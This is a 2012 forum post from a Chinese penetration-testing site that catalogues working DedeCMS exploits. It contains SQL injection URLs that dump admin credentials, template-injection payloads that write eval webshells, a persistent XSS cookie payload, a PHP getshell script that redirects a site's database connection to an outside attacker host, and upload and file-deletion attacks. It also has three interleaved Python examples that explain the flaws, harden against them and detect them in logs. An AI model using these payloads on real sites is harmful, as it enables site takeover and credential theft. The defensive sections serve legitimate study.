中国网络渗透测试联盟

Title: DedeCMS vulnerability summary

Author: admin    Time: 2012-10-18 10:42

Dedecms 5.6 rss injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a software item; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This writes x.php with password xiao, directly producing a one-line webshell.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

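The three URLs above are the wide-byte (GBK) pattern: the application escapes the quote in uid by prefixing a backslash, but when the MySQL connection charset is GBK, a byte in the GBK lead range placed right before the quote swallows that backslash (0x5C is a valid trail byte) into one two-byte character, and the quote reaches the parser unescaped. The Python below is an added example, not code from the post or from DedeCMS: it shows byte-level escaping failing under GBK and a charset-aware escape that decodes strictly before escaping. All input bytes are constructed; 0xE6 is used as the lead byte.

```python
import re

ESCAPED_BYTES = (0x27, 0x22, 0x5C, 0x00)   # ' " \ NUL: the bytes PHP's addslashes() prefixes
BARE_QUOTE = re.compile(r"(?<!\\)['\"]")   # a quote with no backslash directly in front of it


def addslashes_bytes(data: bytes) -> bytes:
    """Charset-blind, byte-level escaping: put 0x5C before each byte in ESCAPED_BYTES."""
    out = bytearray()
    for b in data:
        if b in ESCAPED_BYTES:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def escaped_quote_survives(user_bytes: bytes, charset: str = "gbk") -> bool:
    """Escape at byte level, then decode the way a server on that charset would.
    If a quote is still present with no backslash before it, the backslash was
    absorbed as the trail byte of a two-byte character and the attacker-controlled
    value can close the SQL string literal."""
    decoded = addslashes_bytes(user_bytes).decode(charset, errors="replace")
    return BARE_QUOTE.search(decoded) is not None


def charset_aware_escape(user_bytes: bytes, charset: str = "gbk") -> bytes:
    """Decode strictly in the connection charset first, escape in character space,
    then re-encode. A lone lead byte followed by a quote is not valid GBK text,
    so it is rejected instead of being forwarded to the database."""
    try:
        text = user_bytes.decode(charset)
    except UnicodeDecodeError as exc:
        raise ValueError("input is not valid %s text" % charset) from exc
    text = (text.replace("\\", "\\\\").replace("'", "\\'")
                .replace('"', '\\"').replace("\x00", "\\0"))
    return text.encode(charset)


def is_rejected(user_bytes: bytes, charset: str = "gbk") -> bool:
    """True if the charset-aware path refuses the input."""
    try:
        charset_aware_escape(user_bytes, charset)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed samples: a plain quote, a GBK lead byte before a quote, valid GBK text.
    for sample in (b"O'Neil", b"\xe6'", "涛声依旧'".encode("gbk")):
        print(sample, "byte-level escape bypassed:", escaped_quote_survives(sample),
              "rejected by strict decode:", is_rejected(sample))
```

The complete remedy is a parameterised query, where the value never becomes part of the SQL text; where escaping is unavoidable, it must be done with the connection charset known (what mysql_real_escape_string does after the charset is set), which is what the strict decode step models here.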
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; afterwards, visiting either of the URLs below in any way triggers our XSS.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry into the backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you can enter the site backend directly.

The precondition for this vulnerability is that the backend path must be known.

Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

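The variable-overwrite getshell script, the backend-login entry and the mytag_js.php form above all rest on one weakness: request keys such as _COOKIE[GLOBALS][cfg_dbhost] or _POST[GLOBALS][cfg_dbhost] are bound into the script's global scope, so the attacker's value replaces the configured database connection and the site reads templates from a database the attacker controls. The Python below is an added example, not DedeCMS code and not from the post; it simulates that registration loop and the fix, a check that aborts the request when a key begins with cfg_, GLOBALS, _GET, _POST or _COOKIE (the same prefix check later DedeCMS releases apply). The configuration values and request bodies are constructed.

```python
import re
from urllib.parse import parse_qs

# Constructed stand-in for the cfg_* settings a DedeCMS-style script keeps in global scope.
DEFAULT_CONFIG = {"cfg_dbhost": "localhost", "cfg_dbuser": "dede", "cfg_dbprefix": "dede_"}

# Request keys that must never be bound into the global scope.
FORBIDDEN_KEY = re.compile(r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE)")


def php_nested(body):
    """Parse 'a[b][c]=v&d=w' into nested dicts the way PHP builds its request arrays."""
    tree = {}
    for key, values in parse_qs(body, keep_blank_values=True).items():
        parts = re.findall(r"[^\[\]]+", key)   # "_COOKIE[GLOBALS][cfg_dbhost]" -> 3 parts
        if not parts:
            continue
        node = tree
        for part in parts[:-1]:
            node = node.setdefault(part, {})
        node[parts[-1]] = values[-1]
    return tree


def key_allowed(key):
    """The hardening check: refuse keys that would shadow configuration or superglobals."""
    return FORBIDDEN_KEY.match(key) is None


def register_request_vars(config, superglobals, key_filter=None):
    """Simulate binding every request key as a global, one pass each over _GET, _POST, _COOKIE.
    A key that names a superglobal replaces it for the later passes; a key named GLOBALS is
    the global scope itself, so nested cfg_* values land directly in config. With key_filter
    set, a forbidden key aborts the request instead."""
    for name in ("_GET", "_POST", "_COOKIE"):
        for key, value in list(superglobals[name].items()):
            if key_filter is not None and not key_filter(key):
                raise ValueError("Request var not allow: %s" % key)
            if key in superglobals and isinstance(value, dict):
                superglobals[key] = value          # ${'_COOKIE'} = array(...)
            elif key == "GLOBALS" and isinstance(value, dict):
                config.update(value)               # ${'GLOBALS'} = array(...) writes into config
            else:
                config[key] = value
    return config


def handle_post(body, hardened):
    """Run one POST body through the registration and return the resulting config."""
    superglobals = {"_GET": {"aid": "1"}, "_POST": php_nested(body), "_COOKIE": {}}
    return register_request_vars(dict(DEFAULT_CONFIG), superglobals,
                                 key_allowed if hardened else None)


def overwrite_blocked(body):
    """True if the hardened registration refuses the request."""
    try:
        handle_post(body, hardened=True)
    except ValueError:
        return True
    return False


# Constructed bodies shaped like the forms in the post (192.0.2.5 is a documentation address).
OVERWRITE_BODY = ("doaction=x&_COOKIE[GLOBALS][cfg_dbhost]=192.0.2.5"
                  "&_COOKIE[GLOBALS][cfg_dbuser]=attacker")
BENIGN_BODY = "doaction=x&q=hello"

if __name__ == "__main__":
    print("unpatched:", handle_post(OVERWRITE_BODY, hardened=False)["cfg_dbhost"])
    print("hardened refuses overwrite:", overwrite_blocked(OVERWRITE_BODY))
    print("hardened passes benign request:", not overwrite_blocked(BENIGN_BODY))
```

The prefix check reproduces the remedy the project chose; the stronger design is to bind only an explicit allow-list of expected parameter names and never copy request keys into the scope that holds configuration.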

Dedecms <= V5.6 Final template execution vulnerability
Register a user, enter the member backend, publish an article and upload an image; then, in attachment management, replace the image with our specially crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(constructed here)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>

Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5 password; from that, remove 3 characters at the front and 1 at the end to get the 16-character MD5.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php page uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric-field overflow that raises an error, combined with DEDECMS writing database error messages into a PHP file whose header performs no check.
1. Visit the URL:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is shown.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the output from step 2 means the file trojan was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
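Almost every entry in this summary leaves a recognisable trace in the web server's access log: _Cs[ array keys sent to plus/rss.php, a raw sql= parameter to plus/advancedsearch.php, a gotopage= value carrying markup, cfg_* settings arriving inside a request (the GLOBALS overwrite used by several entries), requests to data/mysql_error_trace.php, ../ in the file-path parameters of edit_face.php and carbuyaction.php, and UNION SELECT in the query strings of feedback_js.php and infosearch.php. The Python below is an added example, not from the post, that runs those rules over Common Log Format lines. The log lines, addresses and rule names are constructed; matching is done on the URL-decoded query string, so percent-encoding alone does not hide a pattern.

```python
import re
from urllib.parse import unquote, urlsplit

# Common Log Format: ip ident user [time] "METHOD target PROTO" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule: (name, predicate over (method, path, decoded query)).
# Paths assume DedeCMS is installed at the web root; adjust for an install prefix.
RULES = [
    ("rss.php _Cs array injection",
     lambda m, p, q: p.endswith("/plus/rss.php") and "_Cs[" in q),
    ("advancedsearch.php raw sql parameter",
     lambda m, p, q: p.endswith("/plus/advancedsearch.php")
     and re.search(r"(?:^|&)sql=", q) is not None),
    ("gotopage reflected markup",
     lambda m, p, q: "gotopage=" in q and re.search(r'<script|">', q, re.I) is not None),
    ("cfg_ setting supplied by request (GLOBALS overwrite)",
     lambda m, p, q: re.search(r"cfg_[a-z_]+\]?=", q) is not None),
    ("mysql_error_trace.php requested",
     lambda m, p, q: p.endswith("/data/mysql_error_trace.php")),
    ("directory traversal in file parameter",
     lambda m, p, q: re.search(r"(?:oldface|code)=[^&]*\.\./", q) is not None),
    ("UNION SELECT in query string",
     lambda m, p, q: re.search(r"union\s+select", q, re.I) is not None),
]


def parse_line(line):
    """Split one access-log line into ip, method, path and URL-decoded query.
    The target is split before decoding so an encoded '#' cannot truncate the query."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m["target"])
    return {"ip": m["ip"], "method": m["method"], "path": parts.path,
            "query": unquote(parts.query), "status": int(m["status"])}


def scan(log_text):
    """Return one hit per (line, rule) as dicts with rule, ip, method and path."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, pred in RULES:
            if pred(rec["method"], rec["path"], rec["query"]):
                hits.append({"rule": name, "ip": rec["ip"],
                             "method": rec["method"], "path": rec["path"]})
    return hits


# Constructed sample log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
203.0.113.10 - - [18/Oct/2012:10:42:01 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%201%23'][0]=1 HTTP/1.1" 200 512
203.0.113.10 - - [18/Oct/2012:10:42:05 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 2048
203.0.113.11 - - [18/Oct/2012:10:43:00 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024
203.0.113.12 - - [18/Oct/2012:10:44:10 +0800] "GET /dede/login.php?dopost=login&_POST[GLOBALS][cfg_dbhost]=192.0.2.5 HTTP/1.1" 302 0
203.0.113.12 - - [18/Oct/2012:10:44:30 +0800] "POST /data/mysql_error_trace.php HTTP/1.1" 200 87
203.0.113.13 - - [18/Oct/2012:10:45:00 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 300
198.51.100.7 - - [18/Oct/2012:10:46:00 +0800] "GET /plus/list.php?tid=3 HTTP/1.1" 200 4096
198.51.100.7 - - [18/Oct/2012:10:46:02 +0800] "GET /plus/rss.php?tid=3 HTTP/1.1" 200 1900
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f'{h["ip"]:15} {h["method"]:4} {h["path"]:40} {h["rule"]}')
```

POST bodies are not in an access log, so the mytag_js.php and select_soft_post.php entries, whose cfg_* keys travel in the body, need a request-body log or a WAF rule with the same key pattern; the mysql_error_trace.php rule is the reliable log-side indicator for that chain because the file is fetched afterwards.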





Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2